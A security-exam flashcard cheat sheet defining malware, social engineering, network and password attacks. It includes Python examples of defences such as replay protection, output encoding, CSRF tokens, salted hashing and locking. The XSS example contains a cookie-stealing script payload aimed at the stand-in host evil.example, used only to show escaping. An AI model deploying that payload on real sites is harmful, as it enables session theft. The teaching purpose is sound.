Cheat Sheet Flashcards
Virus
malicious code that attaches itself to a host file or program and needs that host (or a user) to run before it can replicate
Polymorphic virus
rewrites its own code on each infection, so its hash value (signature) changes and signature-based antivirus misses it
Ransomware
encrypts your files and demands payment for the key; may stay quiet until the encryption is finished
Worm
self-replicating; spreads across the network on its own without any user action
Trojan
poses as legitimate software; once run it installs a hidden payload, for example by replacing or adding .dll files
Rootkit
hides deep in the OS (kernel, boot sector or firmware) and conceals its own files and processes; a firmware or boot-level rootkit can survive an OS reinstall, so detect it by comparing against a known-good baseline rather than trusting the running system's own tools
Keylogger
logs keystrokes
Adware
displays unwanted adverts, typically as popups
Bots
infected machines controlled remotely by a command-and-control server (a botnet); used as the attack vector for DDoS, spam and similar attacks
RAT
remote access trojan; gives the attacker remote control of the machine, including harvesting passwords that are then used to log in
Logic bomb
dormant code that fires only on a trigger, such as a date/time or an event
Phishing
mass email sent to many recipients in the hope that some click; not targeted
Spear phishing
targeted version aimed at a specific person or organization; look for a named target in the question
Whaling
attacks CEO or high‐level executives
Vishing
uses a telephone or leaves a voicemail
Tailgating
follows someone through; does not use credentials
Impersonating
pretends to be from the help desk or IT team
Dumpster diving
pulls information from the trash bin
Shoulder surfing
someone looks over an employee's shoulder, or films a PIN entry or bank transaction with a smartphone
Watering hole
compromises a trusted website that the target group is known to visit, so visitors get infected
Authority
email appears to come from the CEO or HR and asks you to fill in a form; people comply because of the sender's position
Urgency
creates a sense of emergency so that checks are skipped, e.g., someone dressed as a firefighter demanding immediate entry to the server room
DoS
a single host overwhelms one target so it cannot serve legitimate users
DDoS
many hosts (usually a botnet) flood one target at the same time
Man‐in‐the‐middle
attacker sits between two parties and intercepts or alters the data in real time
Replay
captured traffic is resent at a later date to re-authenticate or repeat a transaction; prevented by timestamps and nonces
Kerberos
uses timestamps and ticket lifetimes to stop replay; replaces NTLM, so pass‐the‐hash does not apply (stolen tickets can still be passed, so protect the ticket cache)
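The replay and man-in-the-middle cards above describe the problem; the code below is an added example (not from the original cheat sheet) of the standard countermeasure: every message carries a timestamp and a fresh nonce, all three are bound with an HMAC, and the receiver rejects anything stale, already seen, or modified. The shared key, the 5-minute skew window (the Kerberos default) and the messages are constructed for the example.

```python
import hashlib
import hmac
import os
import time

# Constructed shared secret for this example (an assumption; real systems derive
# per-session keys). Kerberos allows 5 minutes of clock skew by default.
SHARED_KEY = b"example-shared-key-not-for-production"
MAX_SKEW = 300


def make_message(payload, key=SHARED_KEY, now=None):
    """Client side: bind the payload to a timestamp and a fresh nonce, then MAC all three."""
    ts = int(now if now is not None else time.time())
    nonce = os.urandom(16).hex()
    body = f"{ts}|{nonce}|".encode() + payload
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return {"ts": ts, "nonce": nonce, "payload": payload, "tag": tag}


class Verifier:
    """Server side: integrity check, freshness window, and a cache of nonces already seen."""

    def __init__(self, key=SHARED_KEY, max_skew=MAX_SKEW):
        self.key = key
        self.max_skew = max_skew
        self.seen = {}  # nonce -> timestamp, so entries outside the window can be dropped

    def accept(self, msg, now=None):
        now = now if now is not None else time.time()
        body = f"{msg['ts']}|{msg['nonce']}|".encode() + msg["payload"]
        expected = hmac.new(self.key, body, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, msg["tag"]):
            return False, "bad MAC"  # altered in transit (man-in-the-middle)
        if abs(now - msg["ts"]) > self.max_skew:
            return False, "stale timestamp"  # captured long ago and resent
        # Expire nonces outside the skew window so the cache stays bounded;
        # anything older is already rejected by the timestamp check above.
        self.seen = {n: t for n, t in self.seen.items() if abs(now - t) <= self.max_skew}
        if msg["nonce"] in self.seen:
            return False, "replayed nonce"  # same message resent inside the window
        self.seen[msg["nonce"]] = msg["ts"]
        return True, "ok"


def demo():
    """Constructed exchange: one genuine message, then the three attacks."""
    v = Verifier()
    t0 = 1_700_000_000
    genuine = make_message(b"transfer 100 to account 42", now=t0)
    first = v.accept(genuine, now=t0 + 1)
    replayed = v.accept(genuine, now=t0 + 2)
    stale = v.accept(make_message(b"transfer 100 to account 42", now=t0), now=t0 + 3600)
    tampered = dict(genuine, payload=b"transfer 900 to account 42")
    modified = v.accept(tampered, now=t0 + 3)
    return first, replayed, stale, modified


if __name__ == "__main__":
    print(demo())
```

The nonce cache is what stops a replay inside the skew window; the timestamp is what lets the cache stay small. Drop either one and the other is insufficient on its own.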
Buffer overflow
more data written to a buffer than it can hold, overwriting adjacent memory; prevented by input validation and bounds checking
Integer overflow
a value exceeds the maximum its data type can hold and wraps around, which can turn a huge length into a small one and bypass a size check
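As an added example (not from the original cheat sheet) of the integer overflow card, the following Python emulates a C-style unsigned 32-bit length check. The buffer size, header length and attacker value are constructed for the example; the point is that `len + HEADER_LEN` wraps to a small number and the copy is wrongly allowed, while the rearranged check cannot wrap.

```python
MASK32 = 0xFFFFFFFF      # uint32_t arithmetic wraps modulo 2**32
BUFFER_SIZE = 4096       # constructed sizes for the example
HEADER_LEN = 16


def u32_add(a, b):
    """Unsigned 32-bit addition as C performs it: the carry is silently discarded."""
    return (a + b) & MASK32


def vulnerable_check(payload_len):
    """Mirrors 'if (len + HEADER_LEN <= BUFFER_SIZE) memcpy(...)' with a uint32 len.
    Returns True when the copy would be allowed."""
    total = u32_add(payload_len, HEADER_LEN)
    return total <= BUFFER_SIZE


def safe_check(payload_len):
    """Same policy, written so the arithmetic cannot wrap: bound the input first,
    then compare against a constant computed by subtraction, never by adding to input."""
    if payload_len < 0 or payload_len > MASK32:
        return False
    return payload_len <= BUFFER_SIZE - HEADER_LEN


def demo():
    attacker_len = 0xFFFFFFF8  # 4294967288; adding 16 wraps to 8
    return {
        "normal": (vulnerable_check(100), safe_check(100)),
        "too_big": (vulnerable_check(5000), safe_check(5000)),
        "wrapped": (vulnerable_check(attacker_len), safe_check(attacker_len)),
        "wrapped_total": u32_add(attacker_len, HEADER_LEN),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(case, result)
```

The wrapped case is the one that matters: the vulnerable check passes, so a subsequent copy of about 4 GB of data into a 4 KB buffer would be attempted, which is how an integer overflow becomes a buffer overflow.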
XSS
attacker injects HTML tags/JavaScript into a trusted website; the script runs in every victim's browser and can steal session cookies; prevented by input validation and output encoding
XSRF/CSRF
tricks a logged-in user's browser into sending a request (via a link, image or hidden form) that the site accepts because the session cookie is attached automatically; prevented by anti-CSRF tokens
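The XSS and CSRF cards are easier to tell apart in code. The following added example (not part of the original cheat sheet) shows both defences side by side: output encoding makes an injected script inert, and a per-session anti-CSRF token makes a forged cross-site request fail even though the browser sends the session cookie. The in-memory session store, the form fields and the evil.example URL are constructed for the example.

```python
import hmac
import secrets
from html import escape

# --- XSS: the fix is output encoding at render time, not trusting the input ---
def render_comment_vulnerable(comment):
    return f"<p>{comment}</p>"  # any <script> inside comment runs in each viewer's browser


def render_comment_safe(comment):
    return f"<p>{escape(comment, quote=True)}</p>"  # tags and quotes become inert text


# --- CSRF: the browser attaches the session cookie to *any* request for the site,
# so the server must also demand a secret that an attacking site cannot read ---
SESSION_DB = {}  # session_id -> anti-CSRF token (constructed in-memory store)


def new_session():
    sid = secrets.token_hex(16)
    SESSION_DB[sid] = secrets.token_hex(32)  # token is bound to this session only
    return sid, SESSION_DB[sid]


def handle_transfer(cookies, form):
    """State-changing request: needs the session cookie AND the matching token."""
    sid = cookies.get("session")
    if sid not in SESSION_DB:
        return 401, "not logged in"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(SESSION_DB[sid], token):
        return 403, "csrf token missing or wrong"
    return 200, f"transferred {form['amount']} to {form['to']}"


def demo():
    sid, token = new_session()
    cookies = {"session": sid}  # the browser sends this with every request to the site
    # Genuine form submission from the real site includes the token it was served.
    genuine = handle_transfer(cookies, {"to": "alice", "amount": "10", "csrf_token": token})
    # Forged request from evil.example: the cookie rides along, but the attacker
    # never saw the token, so the request is refused.
    forged = handle_transfer(cookies, {"to": "mallory", "amount": "9000"})
    payload = "<script>location='https://evil.example/?c='+document.cookie</script>"
    return genuine, forged, render_comment_safe(payload)


if __name__ == "__main__":
    print(demo())
```

Note the contrast: XSS is the attacker's script running inside the victim's origin, so it can read the token and cookies; CSRF is the attacker's page outside the origin, blind to both. A site with an XSS hole therefore cannot rely on CSRF tokens alone.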
Privilege escalation
exploits a bug or misconfiguration to go from a normal user to admin/root rights
ARP poisoning
attacker sends forged ARP replies so traffic is sent to their MAC address; prevented by static entries in the ARP cache (for example, arp ‐s) or by Dynamic ARP Inspection on the switch
DNS poisoning
attacker inserts false records into a resolver's cache; prevented by DNSSEC, which signs zone data and produces RRSIG records that resolvers validate
ARP
has no authentication; ARP attacks are limited to the local LAN segment
Man‐in‐the‐browser
trojan already installed inside the browser alters bank transactions after you submit them; the URL and certificate still look legitimate, so the user sees nothing wrong
Zero‐day virus
exploits a vulnerability unknown to the vendor, so no signature or patch exists; can only be spotted by comparing against a baseline (anomaly detection); the vendor needs time to produce a fix
Pass‐the‐hash
replays a captured NTLM password hash to authenticate without knowing the password; prevented by disabling NTLM or using Kerberos
Session hijacking
steals your session cookie or token and uses it to impersonate you without a password
Evil twin
rogue access point broadcasting the same SSID as a legitimate WAP so clients connect to it instead
Rogue AP
unauthorized access point plugged into the network, often advertised as free Wi‐Fi to capture traffic; 802.1X port authentication stops unauthorized devices from joining the wired network
Jamming
deliberate RF interference that denies wireless service
WPS
push‐button or PIN setup; the 8‐digit PIN is validated in two halves, so it can be brute‐forced in roughly 11,000 attempts and the underlying Wi‐Fi password recovered; disable WPS
Bluejacking
sends unsolicited messages to a nearby Bluetooth phone; a nuisance, no data is taken
Bluesnarfing
steals data such as contacts from a Bluetooth phone
RFID
tags used to track assets and detect theft of small devices; tags can be read or cloned from a distance
NFC
wireless payment; works only within a few centimeters
Birthday
hash‐collision attack; for an n‐bit hash a collision is expected after about 2^(n/2) attempts rather than 2^n, so digital signatures over a weak or short hash are vulnerable
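To make the 2^(n/2) figure on the birthday card concrete, here is an added example (not from the original cheat sheet) that runs a birthday search against SHA‐256 truncated to a small number of bits, and contrasts it with searching for one specific digest using the same budget. The truncation and the message strings are constructed for the example; the hash function itself is unchanged.

```python
import hashlib
import itertools
import math


def truncated_hash(data, bits):
    """SHA-256 cut down to `bits` bits so the search finishes in seconds on a laptop."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_collision(bits):
    """Birthday search: hash distinct messages until two share a truncated digest.
    Returns (msg1, msg2, hashes_computed); expected cost is about 2**(bits/2), not 2**bits."""
    seen = {}
    for i in itertools.count():
        msg = f"msg-{i}".encode()  # constructed inputs; any distinct messages will do
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg


def find_preimage(target, bits, limit):
    """Contrast: hitting one *specific* digest needs about 2**bits tries, so with a
    budget of only `limit` hashes this almost always fails where the collision search succeeds."""
    for i in range(limit):
        msg = f"pre-{i}".encode()
        if truncated_hash(msg, bits) == target:
            return msg
    return None


def demo(bits=24):
    m1, m2, tries = find_collision(bits)
    target = truncated_hash(m1, bits)
    return {
        "collision": (m1, m2),
        "hashes_for_collision": tries,
        "birthday_bound": int(math.sqrt(2 ** bits)),  # ~4096 for 24 bits
        "preimage_bound": 2 ** bits,                   # 16,777,216 for 24 bits
        "preimage_with_same_budget": find_preimage(target, bits, tries),  # None in almost every run
    }


if __name__ == "__main__":
    print(demo())
```

For a signature scheme this means the attacker prepares many harmless and many malicious variants of a document, finds a pair with the same hash, gets the harmless one signed, and swaps it for the malicious one. The defence is a hash long enough that 2^(n/2) is still infeasible.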
Disassociation attacks
spoofed deauthentication/disassociation frames knock clients off the WAP; a wireless denial of service
Rainbow tables
precomputed table of password hashes used to reverse stolen unsalted hashes quickly; defeated by salting each hash
Dictionary
tries every word from a wordlist as the password; prevented by passphrases not found in any dictionary, slow salted hashing and account lockout
Brute force
tries every possible combination; prevented by account lockout with a low threshold, long passwords and slow, salted hashing
Collision
two different inputs produce the same hash value
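The rainbow table, dictionary and brute force cards all come down to how the password is stored. The following added example (not from the original cheat sheet) builds a small precomputed table, shows it reversing an unsalted SHA‐256 instantly, failing against a salted PBKDF2 record, and then shows that a per-record dictionary attack still works but must now pay the full key-derivation cost for every guess. The wordlist, victim password and iteration count are constructed for the example.

```python
import hashlib
import hmac
import os

WORDLIST = ["password", "letmein", "qwerty", "Summer2023", "dragon", "football"]  # constructed

# Attacker side: compute hash -> password once, reuse against every victim.
PRECOMPUTED = {hashlib.sha256(w.encode()).hexdigest(): w for w in WORDLIST}


def lookup_precomputed(stored_hash):
    """Rainbow-table style lookup: no per-victim work at all."""
    return PRECOMPUTED.get(stored_hash)


def store_unsalted(password):
    """What the table attacks: same password, same hash, every time."""
    return hashlib.sha256(password.encode()).hexdigest()


def store_salted(password, iterations=200_000):
    """Random per-user salt makes the precomputed table useless, and the PBKDF2
    iteration count makes each guess cost milliseconds instead of nanoseconds."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def verify_salted(password, record):
    salt_hex, iters, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def dictionary_attack_salted(record):
    """Without a table the attacker must recompute the KDF per record per guess."""
    for w in WORDLIST:
        if verify_salted(w, record):
            return w
    return None


def demo():
    victim = "letmein"
    unsalted = store_unsalted(victim)
    salted = store_salted(victim, iterations=1_000)  # low count only to keep the demo fast
    return {
        "table_hit_unsalted": lookup_precomputed(unsalted),      # "letmein"
        "table_hit_salted": lookup_precomputed(salted),          # None
        "dictionary_on_salted": dictionary_attack_salted(salted),  # "letmein", but one slow guess at a time
        "same_password_same_hash": store_salted(victim, 1_000) == salted,  # False: salts differ
    }


if __name__ == "__main__":
    print(demo())
```

Salting stops the attacker amortizing work across victims; the iteration count (or a memory-hard function such as scrypt or Argon2) caps the guess rate. Account lockout is the online counterpart: it caps the guess rate against the live login.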
Weak implementation
uses a broken protocol such as WEP; use WPA2‐CCMP (AES) or later instead
Downgrade
uses legacy SSL rather than TLS; POODLE is a classic example
Script kiddie
low skill; uses scripts and tools written by others, probably bought on the dark web
Hacktivist
politically motivated agent
Nation state/APT
foreign government agent; well funded, patient and persistent
Organized crime
profit-driven agent; ransomware, fraud and blackmail
Competitors
steal your trade secrets to beat you to market with your product
Insider
employee or contractor with legitimate access (a malicious insider); hardest to detect
Intrusive
actively exploits the target; can cause damage
Black box
tester has no prior knowledge of the target
White box
tester has full knowledge: source code, diagrams, credentials
Gray box
tester has partial knowledge, at least one piece of information such as a password or a network diagram
Fuzzing
feeds random or malformed input into an application to find crashes and unhandled errors; used by both black‐ and white‐box testers
Pivot
gains access to a network through a vulnerable host, then uses it to attack a secondary, more important host
Initial exploitation
the first foothold gained after reconnaissance; where the active part of a pen test starts
Escalation of privileges
moves from the initial foothold to admin rights
Intrusive scan
used in pen testing; actively exploits vulnerabilities and can damage the system
Passive
only observes (sniffing, OSINT); no damage
Credentialed
scan logs in with admin rights, so it sees more: patch levels, audit settings, account and certificate information; fewer false positives
Non‐credentialed
scan without a login; sees only what an outside attacker sees, such as open ports and missing patches on exposed services
Race condition
two threads access the same data at the same time; the gap between checking a value and using it (time‐of‐check to time‐of‐use) lets the other thread change it; prevented by locking
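As an added example (not from the original cheat sheet) of the race condition card, the following Python runs two withdrawals against one account. The unsafe version checks the balance, pauses, then subtracts, so both threads pass the check and the account goes negative; the locked version makes check and update one atomic step. The account, amounts and the deliberate pause (which stands in for real work between check and use) are constructed for the example.

```python
import threading
import time


class Account:
    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_unsafe(self, amount, window=0.2):
        if self.balance >= amount:       # time of check
            time.sleep(window)           # gap a second thread slips into
            self.balance -= amount       # time of use: acts on a stale value
            return True
        return False

    def withdraw_safe(self, amount, window=0.2):
        with self.lock:                  # check and use happen atomically
            if self.balance >= amount:
                time.sleep(window)
                self.balance -= amount
                return True
            return False


def race(method_name, start=100, amount=80):
    """Run two concurrent withdrawals; return (final balance, sorted outcomes)."""
    acct = Account(start)
    results = []

    def worker():
        results.append(getattr(acct, method_name)(amount))

    threads = [threading.Thread(target=worker) for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return acct.balance, sorted(results)


def demo():
    return {
        "unsafe": race("withdraw_unsafe"),  # (-60, [True, True]): both withdrawals succeed
        "safe": race("withdraw_safe"),      # (20, [False, True]): second is refused
    }


if __name__ == "__main__":
    print(demo())
```

The same shape appears in filesystem TOCTOU bugs (check a path, then open it) and in double-spend bugs in payment systems; the fix is always to make the check and the action a single uninterruptible operation.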
End‐of‐life systems
lack of vendor support; no patches
Error handling
users see a short generic error message; the full details are logged for IT support, so attackers learn nothing from error output
Default configuration
default usernames and passwords must be changed before deployment
Untrained users
not complying with policies
Resource exhaustion
running CPU at 100% or running out of memory
Key management
keys are tracked and protected: signed in and out each day, stored securely, and revoked when staff leave